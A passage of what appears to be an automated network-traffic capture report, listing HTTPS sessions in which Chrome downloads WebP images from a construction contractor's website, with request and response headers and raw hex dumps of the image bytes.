                                              2024-09-27 06:20:22 UTC8000INData Raw: f3 0b 28 69 b4 21 7c d3 1f fd 2b a0 d8 4b e0 34 d9 ef c2 e0 f2 7f 4f cb 1d 9b 95 97 b4 99 a2 bf 28 16 da 01 2e 07 a7 9f ff 5e e7 6c 38 d4 59 7b 48 ee 32 64 c3 0e e2 39 ed bd e2 9d 67 1e 28 b8 a0 9f e1 0e 61 79 17 34 69 0b 75 02 e9 69 d7 2d e8 4d 27 5d 4b 4b 65 c9 95 2d b1 75 1a 5b a8 c5 b2 d5 be 8f 1b a1 74 5c 2c 38 b8 9c c1 31 91 09 ff 09 b7 5d dd 01 76 33 62 63 64 ba cf e3 e8 67 42 aa 51 cf 8a 06 81 41 39 07 39 f6 29 cc 40 76 67 bd a4 3a 13 73 e0 53 a6 51 5a 17 cf 46 10 bf 22 ef eb 89 bd 68 24 1f ee 4b a1 53 6e 46 5a f5 bf b4 76 fc 84 e0 02 18 6b fe b1 54 3c 0b 1f 22 f8 8b 80 09 2d de 71 1b 4b de 94 b4 d1 e5 0c f9 4a f2 db a3 81 a7 a0 53 d0 65 1c 06 72 6f ce b8 3a 3e a0 30 ef ad 0f c5 79 43 30 88 e7 27 c0 0b cc cc a6 c3 b3 1a 1f da 50 57 09 65 e2 a5 ef
                                              Data Ascii: (i!|+K4O(.^l8Y{H2d9g(ay4iui-M']KKe-u[t\,81]v3bcdgBQA99)@vg:sSQZF"h$KSnFZvkT<"-qKJSero:>0yC0'PWe
                                              2024-09-27 06:20:22 UTC8000INData Raw: 75 c4 c8 94 5b 77 cb 27 6d 24 d4 9e 43 12 9f d1 66 3a 5b 00 83 9b ef b2 38 8a 6f ad 8d 40 92 57 a8 56 0c f5 51 45 69 a4 25 fc 47 78 51 12 fa 89 d5 ee e2 fd 94 b0 2f 41 5a df 69 9b 3b eb c6 0d f3 34 9f ff b6 1d be 4d 32 5e f0 3d d2 75 b9 9e 4c 06 07 c7 a4 8d ee 4a d6 0a 84 d1 16 8a 8a 44 cf ca d5 b5 5f cf 4e 4b f9 99 7e c3 51 b9 8a 69 12 f3 2c a5 4c cd cf 4e 0c a8 27 43 d0 bf 6f c2 bf 2b ea 6a dc ed 44 7d 06 8a 32 0b 62 07 ca f1 f3 68 ee 15 48 1b d1 cb aa 94 7f 3c 5b ee a7 a9 3f e7 98 56 06 26 7e 55 d6 1d 30 58 b4 71 e3 5c b2 98 7e db 4e 05 98 ec 1e 3d 91 a2 38 f2 ad f7 03 f5 8f 43 e7 a1 74 f7 46 c3 6a ef b5 fa 03 71 ef ad 9f 80 45 6f 3e 04 b2 b5 f4 2b 92 3c 57 89 54 e6 b0 36 84 7d a1 08 8e 82 00 8b 23 c0 92 6a 1d 22 c7 5d 65 b2 14 8c 4d f0 6b 28 47 0c ac
                                              Data Ascii: u[w'm$Cf:[8o@WVQEi%GxQ/AZi;4M2^=uLJD_NK~Qi,LN'Co+jD}2bhH<[?V&~U0Xq\~N=8CtFjqEo>+<WT6}#j"]eMk(G
                                              2024-09-27 06:20:22 UTC8000INData Raw: f2 97 dd 03 59 b0 fe 76 06 96 55 55 9c 24 b1 52 1d 67 dc 02 18 72 ac 5d ed 34 50 33 89 13 18 52 bf c5 a9 3e 5c 54 da c4 e4 bb 08 be 72 90 1a f1 9b e1 16 0c 2f 5c 08 b1 ca 31 4e b2 70 e2 85 b9 43 d6 bb 22 f0 96 f0 d8 6e c7 d6 2d fe 6b 40 50 9e 18 1e 29 cd 19 1c 3a 38 61 a9 e2 56 1d bd 27 c4 d8 9e 61 40 d7 87 f3 ff b6 88 1c 32 67 31 77 4d 3c ba 0b 53 63 e9 c0 b3 f9 70 b7 f5 3c 00 08 c3 10 b8 76 b0 8f f4 33 a5 aa 2c 91 bc 57 2f 3f 48 d6 25 cb 55 78 48 3d 01 4a 8f 5e 4a 0f 9c 49 2c 31 4f 76 00 5a 72 27 45 12 fa 76 78 14 7a c4 11 52 fd fe 97 bb 8d ca 80 8f e3 79 ba d9 f4 d8 0e 2f 10 1d 54 67 12 19 aa 4d 04 24 95 10 91 0c 73 eb 04 7c 49 92 af ca f8 c6 66 cf 01 2a 66 7e db be 39 f3 b8 c0 f6 14 8d db 5c 36 5d 94 f3 86 08 f0 d8 ad 43 25 eb 19 4a e6 da 8d ea b9 3f
                                              Data Ascii: YvUU$Rgr]4P3R>\Tr/\1NpC"n-k@P):8aV'a@2g1wM<Scp<v3,W/?H%UxH=J^JI,1OvZr'EvxzRy/TgM$s|If*f~9\6]C%J?


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              135192.168.2.465471173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:22 UTC465OUTGET /uploads/projects/32/a5af5c8ac06932758cc7ca886fdabf1b.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:22 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:22 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 12:02:11 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 147556
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:22 UTC7930INData Raw: 52 49 46 46 5c 40 02 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 e8 3f 02 00 d0 00 07 9d 01 2a cf 04 a3 03 3e e9 64 a9 4e a9 25 a8 af ac db a9 d1 f0 1d 09 4d db 97 5b 8b e3 78 68 fd c7 66 d4 af 14 68 0f ce 9f f8 fc e0 3f 79 d3 5d 9b fa a6 7b 81 11 f8 11 c2 ac 2d 9d 55 19 f1 6e 51 5c 7d bb e5 e4 7a 5b 0f 79 b2 c8 30 b3 1f 1d fd e3 3d fe c9 76 c6 68 7c 6c f9 df fd 3e 6f 7f 03 df 9b ff 3f ac 8f ee 9f f2 fd 86 7f b8 fa 33 f4 d5 e6 83 f7 87 d6 bf d1 d7 fa ff b8 0f 91 0f f1 de 9a 3e ab 7e 85 bf b7 5e b5 5e ac 9f e6 bd 25 7d 00 3f ff fb 62 ff 00 ff fb d6 4f e6 be 4b be 8f fd 3f 7b 7f 9f fd 8b fc 9f f1 9f e9 bf fb fc 62 7e f7 8d ff 87 ff 43 cc 8f eb 1f b1 3f e1 f7 a9 f3 97 fb 2f db 4f 17 7f 58 fe 4f f6 7f d8 23 df 1e 74 ff 81
                                              Data Ascii: RIFF\@WEBPVP8XVP8 ?*>dN%M[xhfh?y]{-UnQ\}z[y0=vh|l>o?3>~^^%}?bOK?{b~C?/OXO#t
                                              2024-09-27 06:20:22 UTC8000INData Raw: 47 27 ed e0 61 6e 3d 64 34 55 ec 56 60 a2 f1 e1 80 fa 78 ed d5 6d 12 3e 32 7f 97 2b 54 04 ac ec 5a d6 97 0b f8 ee 46 5f 63 39 d9 88 11 87 08 cd ad c9 8d 92 39 bb cd fa 5e d2 3e 70 49 52 a9 4f 4e 77 57 69 98 33 57 7e dc 9b a1 79 00 7e f7 22 2d e2 71 51 88 28 78 01 53 b1 05 cb 10 e8 5d 67 41 7c 7a 18 49 87 e9 8b 46 e8 7d f9 17 f4 e2 af f1 43 80 0e c0 2d fc 8f 8f 53 09 23 bb a4 c2 ae 2d fe 2d be 1b d1 92 04 c3 4a c8 a3 44 42 bb 3f c5 c5 7e 01 69 0c 65 17 3d a4 5d 05 c3 e1 32 b0 14 87 7a 2b 60 9e 1e b5 71 b3 a7 0c bd bb f9 2f be 0f 2d fa 8f 10 86 bb 1d 38 71 5d de fc 9d 95 99 1b 15 28 f0 5c f8 52 af c9 58 da 11 e9 cd 7c 00 0b 62 ad f7 09 61 a5 79 d5 44 a7 b9 b8 ec 43 fc 1f 3a 5d 21 26 da 7d 4d 83 78 5b 84 72 03 0e b1 86 e4 c4 21 3a 12 1d 89 5b e9 a0 6f 7d a4
                                              Data Ascii: G'an=d4UV`xm>2+TZF_c99^>pIRONwWi3W~y~"-qQ(xS]gA|zIF}C-S#--JDB?~ie=]2z+`q/-8q](\RX|bayDC:]!&}Mx[r!:[o}
                                              2024-09-27 06:20:23 UTC8000INData Raw: 8c be c0 8b fb 58 bf 6f 44 21 a4 75 01 1e 3d 3f f3 e2 87 d1 56 0e 36 97 31 a4 0a e1 07 97 f9 60 61 86 f4 16 57 c7 ff 7a 24 76 f9 61 61 e8 59 92 8c a4 5e 10 69 54 6f 34 d3 fd 54 65 29 df 86 27 93 c0 01 a0 4b bc 92 72 28 f4 d6 c0 00 29 f0 05 01 90 6e ec 84 37 33 31 1c b3 98 09 2d 9f c8 e0 7b e8 e3 f8 8d ad 97 58 31 8d 0d 11 8f 63 02 50 63 bb 7a db 9b 70 4e ab df e9 e2 c3 57 3a dc 60 d1 01 a6 d1 00 9a 53 07 b9 ad e1 37 a1 ca ac b6 34 bc 64 53 c3 8c 47 b2 9c 79 d7 d2 b8 4a 03 4e 26 be 4a b7 11 48 77 94 21 93 95 c9 a0 82 c2 24 e0 73 7c b5 0e 80 98 0f 93 6c cf 9a 7c bd 6d e6 13 93 39 8e 8f 94 d7 58 6e e2 ae 11 b2 81 9d 43 19 dd d8 ff 20 cf 49 b3 4e 71 77 75 ec 6c 38 d3 1a 94 45 9f 8f 14 75 f9 57 ef a3 05 53 9e cd 4a 67 61 02 94 49 21 df 04 3c c2 67 aa af 5d 3d
                                              Data Ascii: XoD!u=?V61`aWz$vaaY^iTo4Te)'Kr()n731-{X1cPczpNW:`S74dSGyJN&JHw!$s|l|m9XnC INqwul8EuWSJgaI!<g]=
                                              2024-09-27 06:20:23 UTC8000INData Raw: a2 f8 42 d9 d7 d0 cb b1 39 82 35 8a f2 e5 75 25 9a 15 52 c3 73 72 c0 d2 f8 a8 65 ce 7c 8c c2 12 3f 53 f7 43 b7 2e 21 9a bc 0d 22 d4 65 a1 63 ea 03 5f 30 40 66 45 2c c9 b1 1e aa 51 c0 87 31 7a aa fc 4f 3f d2 2a 6c 27 d8 09 c7 dd e0 f6 8a 6d 4d 6d d2 c4 32 33 6f 31 09 19 62 42 52 9e 49 81 ce 16 fa 64 bc b2 db 69 5b 8d 7c 1c f1 10 2f 8a db e0 c1 f4 ae 72 f1 45 ea 2c c9 a5 30 9b a4 d9 a6 dc 72 92 e5 4e ba 63 a5 ba cd 56 68 16 f3 b7 7f da 93 c0 e4 ad eb 5b 96 3d cf 3f 65 f3 5e 93 26 32 e4 24 fd 0c b9 3e 92 c4 85 78 6a 3c b5 80 82 f1 20 a3 56 d4 eb 80 9b a5 7a 5a 09 55 86 34 fd 99 72 94 8c a0 cd 0e b8 aa 03 d8 6f 3f cf fd d5 53 f8 78 b0 f5 1e 2d d4 7f 97 59 55 8f ec 1f e3 d0 50 8c 4f e7 bc af 9b 4c 30 a6 48 40 a3 d6 ed c3 57 6e e5 40 5f 0e 67 99 c8 d2 5a 46 db
                                              Data Ascii: B95u%Rsre|?SC.!"ec_0@fE,Q1zO?*l'mMm23o1bBRIdi[|/rE,0rNcVh[=?e^&2$>xj< VzZU4ro?Sx-YUPOL0H@Wn@_gZF
                                              2024-09-27 06:20:23 UTC8000INData Raw: 66 3c 3b a0 ab 58 06 1a 81 5c 2e 4f 83 a9 e0 9b 3c c0 b7 ea d6 42 fd 12 86 a7 fd 4d 47 9c e6 48 9c 71 07 17 16 f2 8e f0 19 e5 79 6c 83 60 e9 64 2e 46 93 be 76 51 1b 08 b1 5c 2a f5 71 d9 7a 12 8d 95 2b 47 bb 1e ec 40 e1 f4 ee b3 71 61 e7 b2 e7 6c b9 94 dc f8 8f 9d e7 89 9b 45 c2 1b 34 f2 f4 4b 8d 60 f8 88 78 b3 2d 02 8e b7 ac 32 2b 74 d3 6a db 81 76 88 fe f7 88 0b 75 db 3f b3 d2 41 e3 0c e7 55 28 bf 34 36 5f b2 34 94 d2 a9 b1 92 38 c4 6b e3 4f c7 37 08 96 6f 61 54 86 dd 8f 57 d9 5c 5d 08 0d be fd 04 08 db 66 e7 5e ef 4f 77 d6 b6 70 4c 58 e6 a9 c5 df 31 f3 19 6e 01 e2 06 89 4f 35 3c 76 3c 0a 91 82 94 84 6c a2 38 83 a7 af a6 27 22 4e 9f d7 b6 1d ad 2f 51 77 a6 42 09 bc 9d 42 73 5f 2f 2f de 16 fa af a9 d5 80 5a a1 4c 18 b8 f0 96 58 ad 9d 36 a4 68 f4 14 c7 52
                                              Data Ascii: f<;X\.O<BMGHqyl`d.FvQ\*qz+G@qalE4K`x-2+tjvu?AU(46_48kO7oaTW\]f^OwpLX1nO5<v<l8'"N/QwBBs_//ZLX6hR
                                              2024-09-27 06:20:23 UTC8000INData Raw: 73 9f cd 86 ee a9 e4 6c 07 97 ab 78 99 b0 e1 e1 42 b4 22 65 07 c6 1c 70 bd 72 64 93 4b 9d 61 b3 e5 22 ce 2a f1 89 46 b1 35 e0 26 87 9e 9f bf 69 e4 ab e8 48 0d d0 a8 2e e7 a4 13 b7 d3 d1 de 0e 09 f7 48 de 7b 8c a4 49 37 41 21 27 9a 05 ba ab b3 21 e2 e1 23 cf 5b 6b af 78 16 50 13 ef 08 f4 ed 5d 8e cc 85 f6 af d6 7a 94 d3 2b 13 44 d7 52 2c 40 06 03 a5 36 7d 79 be d8 58 4f 11 e0 e1 8e 7c 9e 18 6a 84 94 5a 95 05 44 fc 45 71 3e 07 ba d7 80 12 4c 20 25 f9 8d fe 10 25 03 15 5b d7 f4 0f 58 96 46 8f f5 26 66 a3 66 e8 da 43 5d 87 cf a9 11 37 9b 51 a8 18 d5 19 f2 1b 7c 73 b4 28 ca 82 31 ef ae 0a 19 68 9e 4e 8b eb c5 47 8f fc d8 a2 dd 48 61 25 91 29 3b 48 76 d9 0f ab fb 94 ff 2f 36 84 be a7 27 a1 5a 36 fb f5 25 52 03 eb 5f ae e4 4f c4 ef ad ff de a8 ea 7d c5 2d 18 fc
                                              Data Ascii: slxB"eprdKa"*F5&iH.H{I7A!'!#[kxP]z+DR,@6}yXO|jZDEq>L %%[XF&ffC]7Q|s(1hNGHa%);Hv/6'Z6%R_O}-
                                              2024-09-27 06:20:23 UTC8000INData Raw: 14 ea 92 fb 85 7e 36 0d da 63 e0 a3 a9 2a 6d cb d6 2d ab 4f f4 2a a3 ea 16 92 52 65 d6 e2 ee aa 17 dd 0c ca 34 14 d3 7f 9a 23 b4 23 34 59 8d 13 59 89 25 99 04 db 18 41 31 96 60 60 5f f8 e0 07 ff 91 5f fc fe da 74 a7 57 fe c6 44 a1 e1 29 cd ad 0b e7 f5 6d 32 c8 66 a4 1b 83 6a dd b7 d0 fb 1e 51 12 a1 5a 0d 8c 5a 4c 42 27 55 74 f9 90 01 8d 66 c3 c9 f5 a2 eb 00 86 89 23 d4 cf 50 77 4e c0 ad 47 c5 02 69 96 f4 6d 7e b7 64 18 1d 35 a3 4e 30 99 44 bb 94 ae 1a 36 32 cf d8 ca 6a f9 90 fa a7 57 c4 a7 89 25 03 aa 85 4f 04 47 46 ac d0 a8 5a 8c 56 08 87 97 05 94 9b fd 45 c1 4e a0 e3 99 02 87 bb b4 e8 7a ce b9 30 da da c5 b9 af 98 0b ff c4 5c 78 0e bf 49 59 28 0a 7c ab 55 70 0f 1e c7 6b 95 71 02 63 4e 10 f5 4f 00 86 28 cb 02 e6 54 8c 71 16 83 dc 93 bb e3 d5 d8 c2 56 02
                                              Data Ascii: ~6c*m-O*Re4##4YY%A1``__tWD)m2fjQZZLB'Utf#PwNGim~d5N0D62jW%OGFZVENz0\xIY(|UpkqcNO(TqV
                                              2024-09-27 06:20:23 UTC8000INData Raw: 58 72 63 fa b7 6e 64 de 82 c0 e6 d3 09 75 d2 90 29 04 20 57 1f 7c b3 16 d8 6a 81 9d 18 8e 1c f5 db 59 6b b6 a3 37 7f 36 8c 2c 0b 9c 5a 76 e1 a7 8f bb 8c 5a 46 f1 b6 cc 84 32 08 be c7 a3 35 c8 29 3b be 9c fd f5 6b fa 78 b1 85 b7 06 8c 96 af 7c 42 3e 8e 27 84 5f 4d 39 01 e0 cb 72 2f 79 e6 66 12 22 a2 da c5 91 84 b6 b4 34 50 cf 50 be 72 a2 9e 76 6c 22 15 b1 17 60 e8 83 cd fd c9 0a f9 b0 9e 91 ad ba a8 1f ee d5 36 9d 1b 90 67 38 09 48 de b9 c8 0d 0d 35 67 94 80 ce 19 74 76 86 38 f3 67 83 a8 fc c6 5a 9f a1 c9 6c 4d a6 e4 07 d5 82 27 05 c7 72 bb 0c 1b e3 fe 2b 9f 75 20 35 47 9a 7e be 07 c1 45 20 b8 fd 4c ba 95 39 b8 5b fe 82 20 59 91 91 42 e0 a2 ac bc 57 d1 64 e7 81 77 24 b7 44 0a b4 e3 c0 cf f8 e8 80 e2 b0 54 9e b3 65 9b bf 9b 3e 03 0a 84 97 5d b5 ff 9d 39 cf
                                              Data Ascii: Xrcndu) W|jYk76,ZvZF25);kx|B>'_M9r/yf"4PPrvl"`6g8H5gtv8gZlM'r+u 5G~E L9[ YBWdw$DTe>]9
                                              2024-09-27 06:20:23 UTC8000INData Raw: ab a2 fc 20 62 f5 1a 03 72 12 5b 23 e3 bd 56 a2 d5 db 46 aa 2c 8d 26 2b 8d 0e 29 c9 52 65 6c ed e5 51 5d 7b 17 12 6a 68 5a 9e b0 a3 89 b7 de 49 70 51 6e 08 49 10 20 75 a1 5a 9e bc 1a 0f c0 55 2c 33 3a e0 e7 9d 17 c3 da 59 c4 c6 69 6e 5e 3a 12 09 b9 c9 2a d7 f3 e8 44 dd 6f b2 0e cd 1b e6 a1 0a d8 6b 00 44 b1 fb c8 23 2c 44 69 49 c2 31 0e aa 24 e0 1c 3b a7 9b 11 64 ec b6 a4 5c ae 9a b7 39 74 2d 76 f7 0c b0 49 6f 4f 7f 84 1f 3a ab 0c 53 7d 6e f2 29 b5 ad 02 41 49 e3 b6 eb 7c 24 a2 49 06 fd 39 c7 fb 29 04 7d 59 45 91 32 c6 d3 ec b9 fd b0 2c 2c 48 da 9a a4 fa 63 43 3a fa 60 aa 98 7c 9d 4d ee fd da 4a 6f 25 79 4f 51 73 da 31 6d 09 d8 30 44 52 59 53 8e 8f e6 51 17 b0 d4 62 5d de 68 8b 2e ef 1b b3 47 02 73 c4 1e c4 89 85 a2 34 8c 40 b1 79 69 06 be 3e 31 56 89 10
                                              Data Ascii: br[#VF,&+)RelQ]{jhZIpQnI uZU,3:Yin^:*DokD#,DiI1$;d\9t-vIoO:S}n)AI|$I9)}YE2,,HcC:`|MJo%yOQs1m0DRYSQb]h.Gs4@yi>1V
                                              2024-09-27 06:20:23 UTC8000INData Raw: b6 95 db ed e4 1a 80 fa 11 9c 2d 92 fa 57 a7 f2 1f c6 52 2b 37 aa e7 31 be 35 84 24 3d 6f b0 d3 2a 42 29 24 a2 a6 9b 19 45 e1 6f 75 53 6b 48 d0 41 8a ab 35 f9 97 3d b8 2a ff a4 2c 52 45 68 13 99 1f 30 3f 88 d0 4c 24 31 a4 01 88 42 8c b0 0b b5 96 a6 f4 0f 69 ad 5d a1 5e 2a d9 00 c2 83 78 05 e2 60 ef af d8 55 ef 74 8f db 3a e4 4a 5c da 55 cb ad a5 53 cd 7f 77 f6 d6 38 59 05 59 12 a7 38 1c ab cc 80 68 0f 17 e8 d6 91 44 6d 86 7f 2f 81 85 5d 87 c6 86 5e 94 b9 67 98 15 78 c3 56 55 48 0d 81 dc a0 4b 6c cb ff da 69 cb 89 9e 69 21 77 d1 f4 f1 bf 55 ca a2 4a 38 54 9c 11 92 81 21 f8 2c c8 ad 1d d1 2f 14 bf e3 71 af fc 35 73 f1 42 ec 6d ad a6 7b f9 5f 54 c2 09 f5 d7 01 30 2a ee 86 82 4c 21 d6 85 47 82 98 9c a3 a5 fe 75 20 33 e6 58 82 d7 a4 57 12 c9 43 dd 36 f1 10 78
                                              Data Ascii: -WR+715$=o*B)$EouSkHA5=*,REh0?L$1Bi]^*x`Ut:J\USw8YY8hDm/]^gxVUHKlii!wUJ8T!,/q5sBm{_T0*L!Gu 3XWC6x


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              136192.168.2.465472173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:23 UTC465OUTGET /uploads/projects/28/d42724b6981b1026789790a7700c638e.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:23 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:23 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:58:06 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 53884
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:23 UTC7931INData Raw: 52 49 46 46 74 d2 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 00 d2 00 00 90 35 04 9d 01 2a cf 04 a3 03 3e e9 70 b0 53 a9 26 2f 30 a4 15 59 c2 10 1d 09 65 6e 73 e3 5b ff 99 c6 cb f5 ff ac ef aa c2 ff b1 e6 4d ff 47 7a f8 f7 f5 fe 5e ff ba fd b4 dc cc d1 5f e2 de 60 1e 8d fc 7f 7f 53 11 d2 e9 31 16 02 0b aa fc cf 1b 0a 7f e9 3c fe 1f 9b 7f f0 76 ed a7 dd 68 cc d7 d5 cf 6b 7e c7 f9 5f dd ef 19 fd a9 7a ef a7 cf a1 8c de bc 63 2f 7f 7b fe bb ce 07 fc df db ef 7a 1f d5 7f c3 7f de fc ff fa 0f fe cd fe 4b d5 5f fd ef dc cf 7f df d5 bf f0 7a 9d fe 93 fe b7 f7 1f de 4b ff 47 ee 5f bd 2f f5 1e a1 df d7 3f d6 f5 c2 7f 7e f5 2c fd cc f5 a0 ff df fb 97 f1 3b fd d7 ff 17 ee 8f b7 36 a9 df db 3f f6 f9 de fa c7 f9 fe 06 fe 8d d8
                                              Data Ascii: RIFFtWEBPVP8XVP8 5*>pS&/0Yens[MGz^_`S1<vhk~_zc/{zK_zKG_/?~,;6?
                                              2024-09-27 06:20:23 UTC8000INData Raw: a5 3d a6 55 d9 d3 99 8c b2 46 62 d4 53 39 09 dd 97 27 10 9f 86 3e 8a ab 42 42 90 66 e3 71 43 93 d4 89 31 58 de 03 c5 5f b0 db 5d 34 86 ac fd e7 ea 4b b1 a4 28 c9 c6 96 99 a4 45 ae 6a ac f0 6b 49 37 90 70 e6 2e 1a 65 15 f3 fd 6b 90 ff a5 f7 ea 1b 59 51 9f 46 f8 f4 56 81 86 c4 39 9f b6 89 6d 5b 22 e0 71 d5 96 4a 58 14 9e 1f 6c 57 a2 3c 05 42 cb 05 1d f8 9a 2d 8a 61 4e fa c7 a9 f8 db ce 21 12 ee f1 2d c2 b4 eb d6 7c 86 43 2e 4c e5 ee e1 4f 32 b7 57 7a 4f 95 1f 5e d4 69 7a e2 ee 01 7c f1 0d f1 8b 93 6f 13 59 85 f7 c1 d7 df f2 79 60 99 6f 52 58 5f 3a f4 85 f5 2f 2c 11 29 46 fb 52 7b 86 e4 f2 20 f9 ff 67 15 70 94 11 f4 a3 36 54 fb b3 fe 86 dc ad 10 57 fe ba b5 ac c2 13 87 46 6e c9 73 73 6d b6 bf fd 32 5a 61 9f af bd 37 eb f5 0f d5 ac 6d a8 06 f1 43 ae c2 49 ce
                                              Data Ascii: =UFbS9'>BBfqC1X_]4K(EjkI7p.ekYQFV9m["qJXlW<B-aN!-|C.LO2WzO^iz|oYy`oRX_:/,)FR{ gp6TWFnssm2Za7mCI
                                              2024-09-27 06:20:23 UTC8000INData Raw: 92 79 a1 e0 76 bd ff 35 79 5f 8c c7 dd f5 d4 3c f3 39 f1 66 8a e3 da ad b6 05 93 00 80 3e 8f e8 ff a9 8c 43 ab 2f d1 65 20 1e 8e 6d f3 f7 66 3b 7b 5d af 68 98 d9 a3 4b d2 98 e5 43 e5 56 c7 3f 5d e9 2d 23 71 f5 56 83 f6 5b 84 4e c0 f2 4c cf a7 40 39 25 d1 2d d6 81 3e f1 da d5 3b 35 d9 ac 6e 11 4b d6 89 0a 51 1b d2 4b c2 46 42 62 fa 32 9c 95 9d f3 ce a5 4b 6e 5c 31 c5 9e 8b c6 e0 f9 12 d2 11 f7 fd af 19 86 5b fb 6b 44 d7 4e 2f b4 9b 3d f6 7c 5a 7f 72 37 d1 6c e8 48 07 96 14 7e 97 6b 27 b5 b2 6a c2 5d 60 05 f8 44 d2 5e 2b 9c 89 ed 94 b8 4f 5f 75 9b 1f 78 d0 6a 57 50 15 41 09 7b 8d aa 94 b0 48 0d 95 a4 9a 48 a7 1e 12 34 37 6b 26 86 3b 81 87 b4 b9 d4 1c b4 a9 a4 64 a2 21 f2 42 dc 89 7f a7 5f bb 36 d0 da 90 29 5a ed 5e 22 6d f7 04 3f 6a 94 57 07 b9 ff 7c 32 2f
                                              Data Ascii: yv5y_<9f>C/e mf;{]hKCV?]-#qV[NL@9%->;5nKQKFBb2Kn\1[kDN/=|Zr7lH~k'j]`D^+O_uxjWPA{HH47k&;d!B_6)Z^"m?jW|2/
                                              2024-09-27 06:20:23 UTC8000INData Raw: fa 80 13 89 c9 a8 a1 10 45 a5 d7 3b e8 bb aa 27 7e 02 05 4f 02 01 e7 30 b2 ad 87 89 24 e8 19 3f f6 93 3e 12 5d cf ea ee 43 f4 47 92 10 83 85 d4 40 75 b3 99 4f 91 c5 f9 fb d7 d3 c5 4f cb fc b9 d4 d1 b0 c1 7b 74 6a 25 db 08 73 40 d4 5b f7 ce 8c 74 28 5c 4d 05 12 d3 9e 16 c7 65 50 ee 01 5b cc 6e a4 41 71 4a 30 52 4c 20 f6 e7 4b e1 c5 f1 0e 5e 32 31 6d c0 f5 22 ae f3 da 12 95 5f ba 04 75 80 2c 79 78 8b 73 6d ba ab 22 34 1c 64 bf 06 0b 3c a8 e5 4e 18 68 2b 37 55 77 4d 32 4d 1f 20 08 e9 36 68 cd cc 85 c6 45 96 db 06 42 4c 29 99 b2 b6 dd e0 bd b6 e1 b8 5b 9c 52 fa f3 48 79 16 89 a5 ae d3 80 d2 0a cc f8 58 4b a5 57 f8 39 1b 91 9e 94 d3 bd a3 ca 94 ee 0f 55 88 61 35 c9 73 4e cb 61 6c a3 5f 2a 27 63 72 fc e0 a7 3a 4b 15 6a d7 45 da 26 74 84 d8 14 79 da d5 64 30 2e
                                              Data Ascii: E;'~O0$?>]CG@uOO{tj%s@[t(\MeP[nAqJ0RL K^21m"_u,yxsm"4d<Nh+7UwM2M 6hEBL)[RHyXKW9Ua5sNal_*'cr:KjE&tyd0.
                                              2024-09-27 06:20:23 UTC8000INData Raw: 79 67 d7 d7 2c 7e 7f b8 9c 02 76 23 92 10 fc 98 fa ba 16 4e e2 4c d4 58 6a b2 d0 92 ec f8 42 55 da 10 67 03 28 96 4f 86 7d d6 53 c0 f4 28 1d a4 99 94 ad ae 8e 9d 3d 27 19 67 36 c6 20 a2 05 88 c0 d1 59 06 60 45 7c 6a b3 88 83 e3 b4 29 96 3b f4 38 6b 84 4e 8c 37 02 7f 26 52 e5 64 01 de 7a 2c 57 32 58 7a 6c 2c 64 3a ab 91 da 3f 83 e6 92 1b 2c b0 19 8b 96 bd 11 6d 3b 95 59 23 02 58 e0 4c 03 2b 3f 21 40 db 4e 3e c8 d5 df ba f3 6f c1 8e 3a 12 d6 40 70 03 18 1e 5a ce a0 ec 98 56 58 a8 73 a8 a9 8b 55 76 53 2f 67 3f d8 59 dd fb 6a b4 a6 36 d8 3a 77 7f 3a f9 d5 2c c8 c7 d1 91 fe 3d 1e 6c ca 5b 1a 59 29 73 3d 42 f0 24 d8 47 7b 6e d9 9c b1 5e 51 d8 31 3b d2 15 03 50 76 3f cd 63 23 0f 32 84 17 02 3b ce be bc db cd 2b a0 8a 4b ae 5a 18 7b dc 11 5b a8 2d 03 1e 65 46 3f
                                              Data Ascii: yg,~v#NLXjBUg(O}S(='g6 Y`E|j);8kN7&Rdz,W2Xzl,d:?,m;Y#XL+?!@N>o:@pZVXsUvS/g?Yj6:w:,=l[Y)s=B$G{n^Q1;Pv?c#2;+KZ{[-eF?
